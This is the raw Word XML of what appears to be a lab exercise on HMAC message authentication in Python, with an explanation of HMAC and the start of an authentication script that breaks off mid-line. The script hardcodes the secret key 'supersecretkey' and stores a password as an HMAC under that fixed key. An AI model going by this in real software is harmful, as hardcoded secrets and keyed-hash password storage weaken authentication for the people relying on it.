h2oMJpuOlx5dIjIas8U8pMr&#10;16sMX8gbOHQHvFFFzMUy3ArtMdJc69bDk9+AMW9dt16F5kLC+CPCqPrzJYSZB2cq17fkTFtCn3vc&#10;k4WY6+n60Rzmp8SmLTSNodEP03b1ZorNb0u0dsXfWnbjuMh46OdIwY6XwSefnyXq1yq4+x7qf6Tm&#10;6qUuvOZWb+SaV/LyPXr3Wr23OvxxcP8vAAAA//8DAFBLAwQUAAYACAAAACEA7EgtB+AAAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBSE74L/YXmCN7vZmgaN2ZRS1FMRbIXS22vymoRm34bs&#10;Nkn/vduTHocZZr7JlpNpxUC9ayxrULMIBHFhy4YrDT+7j6cXEM4jl9haJg1XcrDM7+8yTEs78jcN&#10;W1+JUMIuRQ21910qpStqMuhmtiMO3sn2Bn2QfSXLHsdQblo5j6JEGmw4LNTY0bqm4ry9GA2fI46r&#10;Z/U+bM6n9fWwW3ztN4q0fnyYVm8gPE3+Lww3/IAOeWA62guXTrRBx3H44jXEySuIW0CpZA7iqGER&#10;KZB5Jv9fyH8BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEACmL1QjoEAACAGAAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA7EgtB+AAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACUBgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKEHAAAAAA==&#10;">
                <v:shape id="Graphic 18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rNwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvSPyHyEi7QToOAwoBTbBpOzJA4moa0xYap2syKPz6+YDEzdZ7fu/zbNG6Sl2oCaVnA6+DBBRx&#10;5m3JuYHd9rM/BhUissXKMxm4UYDFvNuZYWr9lX/osom5khAOKRooYqxTrUNWkMMw8DWxaEffOIyy&#10;Nrm2DV4l3FV6mCRv2mHJ0lBgTcuCsvPmzxk47Ozqdz0Zjmx+O+4/vk53OtDdmJde+z4FFamNT/Pj&#10;+tsKvsDKLzKAnv8DAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA0aNqzcMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19672r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 19" o:spid="_x0000_s1028" style="position:absolute;left:61704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B4wAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X+h/CFHqrWXsouhpFLYVerLi292EzZhc3kyXJPvz3jSB4m4/vOcv1aBvRkw+1YwXTSQaCuHS6&#10;ZqPg9/T1NgMRIrLGxjEpuFKA9er5aYm5dgMfqS+iESmEQ44KqhjbXMpQVmQxTFxLnLiz8xZjgt5I&#10;7XFI4baR71n2IS3WnBoqbGlXUXkpOqtA7mfz7fWw61pT7H8+fTf8HXqj1OvLuFmAiDTGh/ju/tZp&#10;/hxuv6QD5OofAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAgLNQeMAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 20" o:spid="_x0000_s1029" style="position:absolute;left:3;top:3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4DwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4L/g/hCbtpqoO51aaiwkAP25gbBW+P5tkUm5eSZNr998th4PHj+12sB9uJK/nQOlYwn2UgiGun&#10;W24UfH+9Tp9BhIissXNMCn4pwLocjwrMtbvxJ12PsREphEOOCkyMfS5lqA1ZDDPXEyfu7LzFmKBv&#10;pPZ4S+G2k4sse5IWW04NBnvaGaovxx+roPLebD7e37Z0eOxP7TKrXrahUuphMmxWICIN8S7+d++1&#10;gkVan76kHyDLPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAxLI4DwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 21" o:spid="_x0000_s1030" style="position:absolute;left:61704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P6wQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGEvoqkeFqlGWZQFD6WwVjw/mrdNsXkpSVbrv98IgsdhZr5hNrvBduJGPrSOFSzmGQji&#10;2umWGwXn6nu2AhEissbOMSl4UIDddjzaYK7dnX/odoqNSBAOOSowMfa5lKE2ZDHMXU+cvF/nLcYk&#10;fSO1x3uC204us+xTWmw5LRjsaW+ovp7+rIIpl0Vp2upqD9WlynwRyk4WSn1Mhq81iEhDfIdf7aNW&#10;sFzA80v6AXL7DwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHG9g/rBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 22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7r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 23" o:spid="_x0000_s1032" style="position:absolute;left:3;top:171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3QxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5QleSt2YFiupaygRQfBiraLHR/Y1CWbfLtlV47/vCgWPw8x8w8zy3rTiQp1vLCsYjxIQ&#10;xKXVDVcKdj/L1ykIH5A1tpZJwY085PPnpxlm2l75my7bUIkIYZ+hgjoEl0npy5oM+pF1xNH7tZ3B&#10;EGVXSd3hNcJNK9MkmUiDDceFGh0VNZWn7dlEysQVjUn37rzbvG8Ot+X6ZXH8UGo46L8+QQTqwyP8&#10;315pBekb3L/EHyDnfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCRdO3QxQAAANs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DE00BE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CF3EA2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897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HMAC-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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hmac module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A29CE1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="19"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336916EA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="230" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="953"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim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hmac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-59"/>
          <w:sz w:val="20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HMAC-based (Hash-based Message Authentication Code) authentication system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0EB2C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756AD17F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1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1DF3DF2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC502A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3402D96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6C5BAC2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13E8E6B5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DD5CE4C" wp14:editId="4E5819BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297263</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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704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888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652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1C89A" id="Group 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.4pt;width:486.1pt;height:1.65pt;z-index:-15726080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n9WgQAAH8YAAAOAAAAZHJzL2Uyb0RvYy54bWzsWVFvmzAQfp+0/4B4XwmQhgY1naZtrSZN&#10;26R12rMDJqABZrYT0n+/s50DEkiadN0mTVGl2MBhnz9/393hXr9eF7m1olxkrJzZ7sXItmgZsTgr&#10;FzP72/3tqyvbEpKUMclZSWf2AxX265uXL67rKqQeS1keU27BIKUI62pmp1JWoeOIKKUFEResoiU8&#10;TBgviIRLvnBiTmoYvcgdbzSaODXjccVZRIWAu+/MQ/tGj58kNJKfk0RQaeUzG3yT+pfr37n6dW6u&#10;SbjgpEqzaOMGeYIXBclKmLQZ6h2RxFryrDdUkUWcCZbIi4gVDkuSLKJ6DbAad7SzmjvOlpVeyyKs&#10;F1UDE0C7g9OTh40+re549bX6wo330P3Ioh8CcHHqahF2n6vrRWu8TnihXoJFWGuN6EODKF1LK4Kb&#10;EzfwxwEAH8EzbzS9vDSIRylsS++tKH1/8D2HhGZS7VrjSl0Bd0QLj/g9eL6mpKIadaGW/4VbWQzO&#10;X9pWSQqg8N2GLXAHUFKTg5VCcHMlNmAeiY8HNEZ8fE8zslknCaOlkHeUaaDJ6qOQhrAx9kiKvWhd&#10;YpcD7RXhc014aVtAeG5bQPi5gb8iUr2ndk91rVrvlPEkVRulHFFPC7ai90zbSbVdsJ/GCrcaXG1t&#10;8rJrC6vqWOEzbCs9nrEx88HKYDR8jq2x6857mjUCiuNFORPUTKWWruds4ID5u4ALlmfxbZbnCgDB&#10;F/O3ObdWBJCd3qo/BSa80jEDYorQEED15ix+AP7UwJiZLX4uCae2lX8ogaGwcokdjp05drjM3zId&#10;sjT2XMj79XfCK6uC7syWoK9PDIlKQmQGOKMMjK16s2RvlpIlmaKN9s14tLkA0RgC/3n1THrqmZyk&#10;HiDAaOy5mlJXV1eGxhhlfDcAdaoQo3tmV1B+3Q1FnCBOP7+CjBcgH91R6LfKMCz2R+NgSxStAdKz&#10;K4td6g7ZwJAajL3KaeY83nJ33ueRzHtP/Z0l00/zqONNKsGEA1TZSTjBSZKBDR+Wy1ZSdgN3rBMZ&#10;MOivS6bxBFRjHNkjG6gilbpbsh9WTscQRYNtV2DuJJiMN4zE59g2ijVTn2A6MHlPQVt511RIByFQ&#10;QLmX3lHBQ4VK190ONLgqbM3qupYDXveMGxdOMv4z4eScgdWXz9BXw55wAjzeCSc6cRxdvyqyYAb2&#10;p76ORSTsp2DXn0LB/69zsPFiTzTZ1sbhUIJLQTFguxVH/MDV5czjWdg93nR35l4QUdUeFvLQ7xY6&#10;nZJ0p3I9p+ETdTPt6Wb6pDTsBhMI4KCLIdGc69b2y6/JvEamj+YaMNgWNEr0eQRzTjSnCcaHL9vt&#10;RAN3gPZHJxrYT13nDAhGlUHNcdK/1EzjyKHPPZUxR56pHzGY70s2muXHnpfgYEh0bLs56RjZ9Kpq&#10;HAjbtkzEdTw67NCicbieIIfL4L3fzwr1cxXcPYf6j7K5PtOFU259pLY5kVfH6N1rfW7V/t/g5hcA&#10;AAD//wMAUEsDBBQABgAIAAAAIQDzX92H3wAAAAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9Ba8JA&#10;EIXvhf6HZYTe6mZtDCVmIyJtT1KoFkpvazImwexsyK5J/PcdT/X4mMeb78vWk23FgL1vHGlQ8wgE&#10;UuHKhioN34f351cQPhgqTesINVzRwzp/fMhMWrqRvnDYh0rwCPnUaKhD6FIpfVGjNX7uOiS+nVxv&#10;TeDYV7LszcjjtpWLKEqkNQ3xh9p0uK2xOO8vVsPHaMbNi3obdufT9vp7WH7+7BRq/TSbNisQAafw&#10;X4YbPqNDzkxHd6HSi5ZzHLNL0BAnrHArKJUsQBw1LCMFMs/kvUL+BwAA//8DAFBLAQItABQABgAI&#10;AAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsB&#10;Ai0AFAAGAAgAAAAhAJTBSf1aBAAAfxgAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0AFAAGAAgAAAAhAPNf3YffAAAACgEAAA8AAAAAAAAAAAAAAAAAtAYAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPMAAADABwAAAAA=&#10;">
                <v:shape id="Graphic 25" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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LSKxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5RV6qxtjW0rqKqIIvfrnYG8v2dckNfs2Zp8m/fauIPQ4zMxvmOl8cI26UBdqzwbGowQU&#10;ceFtzaWB/W798gEqCLLFxjMZ+KMA89njwxQz63ve0GUrpYoQDhkaqETaTOtQVOQwjHxLHL0f3zmU&#10;KLtS2w77CHeNTpPkXTusOS5U2NKyouK4PTsD+etBWH6H782qb1ancp2fJmluzPPTsPgEJTTIf/je&#10;/rIG0je4fYk/QM+uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMAotIrEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m6172200,l,,,20320r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 26" o:spid="_x0000_s1028" style="position:absolute;left:6170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A63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fx+ST9Abn4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAP0AOt8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 27" o:spid="_x0000_s1029" style="position:absolute;left:3;top:8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Z3xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeEJvmtVCtVujaKHQHrR0LQu9PTbPzeLmZUlS3f57Iwgeh5n5hlmsetuKE/nQOFYwGWcg&#10;iCunG64V/OzfR3MQISJrbB2Tgn8KsFo+DBaYa3fmbzoVsRYJwiFHBSbGLpcyVIYshrHriJN3cN5i&#10;TNLXUns8J7ht5TTLnqXFhtOCwY7eDFXH4s8qKL0366/ddkOfT91vM8vKl00olXoc9utXEJH6eA/f&#10;2h9awXQG1y/pB8jlBQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAL7FFnfEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 28" o:spid="_x0000_s1030" style="position:absolute;left:61704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n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Y&#10;9CX9ALl9AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAAAAAA&#10;AAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOCHKme+AAAA2wAAAA8AAAAAAAAA&#10;AAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAADyAgAAAAA=&#10;" path="m3047,l,,,13716r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 29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PM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EcXl/iD5CrJwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBOMhPMwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 30" o:spid="_x0000_s1032" style="position:absolute;left:3;top:176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V6xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/BasJA&#10;EIbvgu+wjNCL1E2t2BJdpViEQi+aWupxyE6T0Ozskl01vn3nIHgc/vm/mW+57l2rztTFxrOBp0kG&#10;irj0tuHKwOFr+/gKKiZki61nMnClCOvVcLDE3PoL7+lcpEoJhGOOBuqUQq51LGtyGCc+EEv26zuH&#10;Scau0rbDi8Bdq6dZNtcOG5YLNQba1FT+FScnlHnYNG76HU6H3Wz3c91+jt+PL8Y8jPq3BahEfbov&#10;39of1sCzfC8u4gF69Q8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDkf+V6xQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA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E7759C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1297C2EF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631DF575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4"/>
        </w:rPr>
        <w:t>HMAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E70E9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351E413C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>HMAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Hash-based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Code)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and authenticity of a message. It combines a cryptographic hash function (like SHA-256) with a secret key to produce a unique value (HMAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B9632D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371EA10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  <w:b/>
        </w:rPr>
        <w:t>How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HMAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D141755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798"/>
        </w:tabs>
        <w:ind w:left="179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secret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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFDB89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798"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1798" w:hanging="358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applied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key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2617CC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798"/>
        </w:tabs>
        <w:ind w:left="179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authenticity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message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BBEDC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2785B7EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>HMAC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intercepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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transmission,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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cannot modify the message without the correct key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED7C79" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64CD2072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2C62A43C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="70"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F435E13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="230" w:lineRule="auto"/>
        <w:ind w:left="36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hmac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="20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 xml:space="preserve">secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CD54C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E0F88A4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(hmac_authentication.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9F915" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44"/>
        <w:ind w:left="360" w:right="8395"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import hmac 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hashlib import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D57E0F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="360" w:right="34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HMAC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(this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kept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secure) SECRET_KEY = b'supersecretkey'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D51E0B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79268918" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="413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HMAC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given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message def generate_hmac(message, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56665BF9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hmac.new(key,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message.encode(),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hashlib.sha256).hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE33BD8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3B7BA5E2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="413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HMAC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given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message def verify_hmac(message, key, expected_hmac):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197B5D5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generated_hmac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generate_hmac(message,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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042760FC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hmac.compare_digest(generated_hmac,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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>expected_hmac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C0444A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/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08B32E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="360" w:right="4861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Simulating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basic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process def authenticate_user(username, password):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CEE5EC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="426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real-world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scenario,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would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hashed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stored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securely # Here, we simulate a stored password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30574C1A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stored_password_hash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generate_hmac("userpassword",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pacing w:val="-2"/>
